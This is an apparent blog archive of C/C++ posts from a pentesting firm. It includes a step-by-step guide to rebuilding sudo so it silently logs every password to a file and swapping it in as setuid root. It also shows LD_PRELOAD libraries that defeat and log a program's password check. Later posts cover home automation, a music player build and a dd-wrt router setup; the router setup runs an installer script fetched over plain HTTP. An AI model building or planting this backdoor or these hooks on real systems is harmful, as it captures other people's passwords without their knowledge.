Category Archives: C/C++

IT Security Brothers (http://itsb.pro)

Hi guys, I would like to present our new project, IT Security Brothers: http://itsb.pro
We provide pentesting, consulting and IT outsourcing services.
Feel free to hire us for IT jobs.

How to get passwords through sudo

This is the classic trojaned-sudo trick: sudo is setuid root and reads the user's password itself, so a rebuilt sudo can write every password it is given to a file. It requires root already (you have to replace /usr/bin/sudo), so it is a credential-harvesting/persistence step, not a privilege escalation.

1) Download the sudo sources.
2) Open the file conversation.c.
3) Add the include:

#include <stdio.h>

4) Find the lines where the password is read:

pass = tgetpass(msg->msg, msg->timeout, flags);
if (pass == NULL)
    goto err;

5) Right after those lines add:

/* Append the cleartext password to a log file. Check the result of fopen():
   if the file cannot be opened, sudo must keep working exactly as before
   instead of crashing on a NULL FILE pointer. */
FILE *file = fopen("/var/log/sudo.log", "a+");
if (file != NULL) {
    fprintf(file, "%s\n", pass);
    fclose(file);
}

6) Build sudo (the README and INSTALL files describe the options, but plain «./configure && make» is enough).
7) Copy the new sudo binary over /usr/bin/sudo.
8) chown root:root /usr/bin/sudo
9) chmod 4755 /usr/bin/sudo

Do the chown before the chmod: on Linux, changing the owner of an executable clears its setuid bit (even when root does it), so the original order (chmod, then chown) leaves a sudo that is no longer setuid and no longer works. «chmod 4000» followed by «chmod +x» is the same as mode 4111; 4755 is what a stock sudo has.

10) After a user has run sudo, the password is in /var/log/sudo.log. The file is created by the root process with root's umask (typically mode 0644), so any local user can read the captured passwords unless you restrict its permissions.

How to use LD_PRELOAD for cracking applications

test.cpp

#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <iostream>
using namespace std;

int main()
{
  // The program never stores the real secret: it derives it at run time by
  // averaging the byte values of two 31-character strings and compares the
  // result with what the user types. Because both literals are 31 characters,
  // the loop's last iteration averages the two terminators and NUL-terminates pass.
  const char *pre_pass = "a382fbe8e8f087352e250561d724c0a";
  const char *salt =     "1qazxcvfdswer435tgbnhy67ujmkdfg";
  char pass[32];
  for(int i = 0; i < 32; i++)
  {
    int a = pre_pass[i];
    int b = salt[i];
    int c = (a + b)/2;
    pass[i] = c;
  }
  char user_input[32];
  cout << "Enter your password's md5 hash for enter to root access level" << endl;
  cout << "> ";
  cin.width(32);          // at most 31 characters plus the terminator fit in user_input
  cin >> user_input;
  if ( strncmp( pass, user_input, 32)==0 )   // the check we are going to hijack
    {
      cout <<  "Secret is " << pass << endl;
    }
  else
    {
      cout << "Access denied" << endl;
    }
  return 0;
}

Compile it with g++:
g++ test.cpp -o test

Now try to get the password ^_^
./test

Enter your password's md5 hash for enter to root access level
> asd
Access denied

How do we hack it? LD_PRELOAD is the answer!

LD_PRELOAD makes the dynamic linker load our shared object before libc, so any function we define with the same name shadows the libc version for the whole process. This only works on dynamically linked binaries, and the loader will not preload user-supplied libraries into setuid programs (so it is no use against the real sudo). Looking at the code, all we need is for strncmp to return zero, so let's do exactly that:
strncmp_lib.c

#include <stddef.h>

/* The prototype must match libc's exactly (the third argument is size_t,
   not int), otherwise gcc warns about conflicting types for the built-in. */
int strncmp(const char *string1, const char *string2, size_t num)
{
    return 0;
}

Compile it with gcc (-ldl is not needed, nothing here calls dlopen/dlsym):
gcc -Wall -O2 -fpic -shared -o strncmp_lib.so strncmp_lib.c

and run the target with the library preloaded (the file name must match what you just built):
LD_PRELOAD="./strncmp_lib.so" ./test

Enter your password's md5 hash for enter to root access level
> asd
Secret is IRLVobmOdUnJU535SfJQLW64lPOOcKd
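The library above returns 0 from every strncmp() in the process. That is enough for test.cpp, but it can break a real target that uses strncmp() elsewhere (the C++ runtime and locale code, option parsing, and so on). The following is an added example, not code from the original post: a selective interposer that keeps real strncmp() semantics for every other call, treats only a compare of exactly 32 bytes (the length test.cpp passes) as the password check, records both operands, and then reports them as equal. Recording the operands matters on its own: the first argument is the derived secret, so the hook leaks it even if you chose not to force the result. The function names, the 32-byte trigger and the log path /tmp/strncmp_hook.log are assumptions made for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Only a compare of exactly this many bytes is treated as the password check
 * (test.cpp calls strncmp(pass, user_input, 32)). Assumed trigger. */
#define TARGET_LEN 32
/* Where the hook records what was compared. Assumed path. */
#define LOG_PATH "/tmp/strncmp_hook.log"

/* Operands of the last intercepted compare (NUL-terminated copies) and a hit
 * counter, so the effect of the interception can be inspected in-process. */
static char last_expected[TARGET_LEN + 1];
static char last_given[TARGET_LEN + 1];
static unsigned long hook_hits;

/* Real strncmp() semantics, reimplemented so the hook does not depend on
 * dlsym(RTLD_NEXT) and every non-target compare in the process stays honest. */
static int plain_strncmp(const char *a, const char *b, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        unsigned char ca = (unsigned char)a[i];
        unsigned char cb = (unsigned char)b[i];
        if (ca != cb)
            return ca - cb;
        if (ca == '\0')
            return 0;
    }
    return 0;
}

/* The decision logic, kept apart from the exported symbol so it can be called
 * (and tested) directly without going through the interposed name. */
int hooked_strncmp(const char *s1, const char *s2, size_t n)
{
    if (n != TARGET_LEN)
        return plain_strncmp(s1, s2, n);      /* not the password check */

    hook_hits++;
    /* %.*s reads at most n bytes, so an unterminated buffer is not overrun. */
    snprintf(last_expected, sizeof last_expected, "%.*s", (int)n, s1);
    snprintf(last_given, sizeof last_given, "%.*s", (int)n, s2);

    FILE *f = fopen(LOG_PATH, "a");
    if (f != NULL) {                          /* never let logging change behaviour */
        fprintf(f, "strncmp(\"%s\", \"%s\", %zu)\n", last_expected, last_given, n);
        fclose(f);
    }
    return 0;                                 /* report "equal" for this call only */
}

/* The symbol the dynamic linker binds ahead of libc's when this object is in
 * LD_PRELOAD. The prototype must match libc's (size_t, not int). */
int strncmp(const char *s1, const char *s2, size_t n)
{
    return hooked_strncmp(s1, s2, n);
}

/* Accessors for the recorded state. */
const char *hook_last_expected(void) { return last_expected; }
const char *hook_last_given(void)    { return last_given; }
unsigned long hook_hit_count(void)   { return hook_hits; }
```

Build it with gcc -Wall -O2 -fPIC -shared -o strncmp_hook.so strncmp_hook.c and run LD_PRELOAD=./strncmp_hook.so ./test: the secret shows up both in the program's own output and in /tmp/strncmp_hook.log. A production interposer would more often forward to the real function with dlsym(RTLD_NEXT, "strncmp") instead of reimplementing it; the reimplementation here avoids the extra dependency. The same idea applies to strcmp(), memcmp() or whatever the target actually uses, and it stops working for statically linked or setuid targets, where LD_PRELOAD is not honoured.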

Home automation


I collected some information from the internet about circuitry, controllers and various examples, and as a confirmation that my small project works, decided to write an article...

So we have: a dir-320 router (with dd-wrt; the installation process is described in the previous article about the dir-320 + C), an ATmega8535 controller, a small control circuit for the optodrivers, the objects to be controlled (reading lamps, the audio system's power, the home water heater), a few wires, a soldering iron and some FREE time.

What I would like to get: software control of devices powered from ~220 V.

The control path for an object looks like this:
Mobile phone -> mobile browser -> wifi (mobile) -> wifi (router dir-320) -> lighttpd -> perl handler -> UART (router) -> UART (ATmega8535 controller) -> control signal (+5 V, controller) -> control signal (+5 V, optodriver) -> switched ~220 V (optodriver) -> controlled object.

In this scheme «Mobile phone -> mobile browser -> wifi (mobile) ->» can be replaced by a laptop, the work PC or a TP.

Control is also possible through the WAN port, i.e. over the Internet, again via lighttpd (which also means the handler is reachable by anyone on the Internet, so it needs at least authentication in front of it).

Pluses of this scheme:
  • No need to get out of bed to switch the lights on or off: everything is controlled from a laptop or a mobile.
  • You can save money by switching the water heater off and on even when you are not at home, over the Internet.
  • Devices can be switched on and off together (on the way home you can switch on the lights where needed beforehand, including the kettle before you arrive).
  • I often forget to unplug devices before leaving. Now it can be done at any time.

Minuses of this scheme:
  • It may not be that convenient to take out the phone every time to switch a light on or off. This is solved by wiring the optodriver in parallel with the light switch, but then the light cannot be switched off remotely while the wall switch is on.
  • Each device needs an extra wire and its own optodriver. The wires have to be fixed to the wall or hidden inside it, which means redoing the wallpaper ))))) The optodriver also has to be hidden inside the socket, God forbid there is not enough room.
  • If the phone or laptop is not at hand, or the computer breaks, nothing can be switched at all. This is solved only by a parallel physical control.


moc player with full ffmpeg support


$ git clone -b yurial git://github.com/yurial/mocp.git
$ cd mocp
$ ./autogen.sh
$ ./configure --without-curl --without-samplerate --without-speex --without-sidplay2 --without-timidity --without-modplug --without-sndfile --without-wavpack --without-flac --without-vorbis --without-musepack --without-aac --without-rcc --without-mp3 --without-magic --without-jack --without-oss --with-gnu-ld --disable-debug
$ make
# make install

Now you can use mocp to play music files in any format that ffmpeg supports.

If you want mocp to detect music files by content rather than by extension, add «FastDirScan=no» to your ~/.moc/config

dir-320 + dd-wrt + gcc (compiling under dir-320)

Go to dd-wrt.com and, in the download section, get the firmware for the dir-320: dd-wrt.v24_usb_generic.bin (latest v24).

You will need a console tftp client; on Windows it can be installed through the standard "add/remove Windows components" dialog, on Linux through the package manager.

Save the firmware in some folder under the name firmware.bin. Open console #1, cd to the folder with firmware.bin, run «tftp 192.168.0.1», then type the command «put firmware.bin» but do not press Enter yet.

Open a second console and start «ping -f 192.168.0.1» (Linux) or «ping 192.168.0.1 -n 1000» (Windows). No ICMP replies should come back yet (assuming, of course, that the router really is at 192.168.0.1 and is switched off).

Power the router off, then on again. Watch for the moment when replies start to arrive in the second console: that is the bootloader's short tftp window, and at that moment press Enter on the prepared command in the first console.

If everything went well, the first console reports that the firmware was transferred successfully. Otherwise repeat the steps above.

Then wait for the «status» LED to light up, or for a wireless network called «dd-wrt» to appear; either signals that the router has booted the new firmware successfully.

The result is a router running dd-wrt.

Next we need a flash drive with an ext2 filesystem. Format it any way you like; an example for Ubuntu Linux:

# mkfs.ext2 /dev/sdb1

The flash drive now has an ext2 partition. Plug it into the router's USB port.

Now adjust the router settings through the web interface. By default the router's IP is now 192.168.1.1, so type 192.168.1.1 in the browser's address bar; login/password is admin/admin. Go to Services -> USB and enable «Core USB Support», «USB 1.1 Support (OHCI)», «USB Storage Support», «ext2/ext3 file system support» and «Automatic Drive Mount», leave the rest disabled, and set the mount point to «/opt». Press «Apply». The router reboots.

Then, on the «Administration» tab (the penultimate one), enable «JFFS2 Support» and press Apply. The router reboots again.

Now log in to the router over telnet:

# telnet 192.168.1.1

login/password is root/admin.

Check that the flash drive got mounted:

# mount

If there is an entry like «/dev/discs/disc0/part1 on /opt type ext2 (rw)», it is mounted.

Then bind-mount a jffs folder from the flash drive:

# mkdir /opt/jffs/

# mount -o bind /opt/jffs/ /jffs/

That's it, the system is ready for installation!

Install optware:

# wget -O /tmp/prep_optware http://wd.mirmana.com/prep_optware

# sh /tmp/prep_optware

Note that this fetches a script over plain HTTP and runs it as root on the router; read it before running it. The process is long, so wait.

Download/update the package list:
# ipkg-opt update

Install buildroot:
# ipkg-opt install buildroot
This takes just as long.

Export the needed environment variable:
# export LD_LIBRARY_PATH=/opt/lib:$LD_LIBRARY_PATH

That's it, now C programs can be compiled on the router:

# gcc <input file> -o <output file>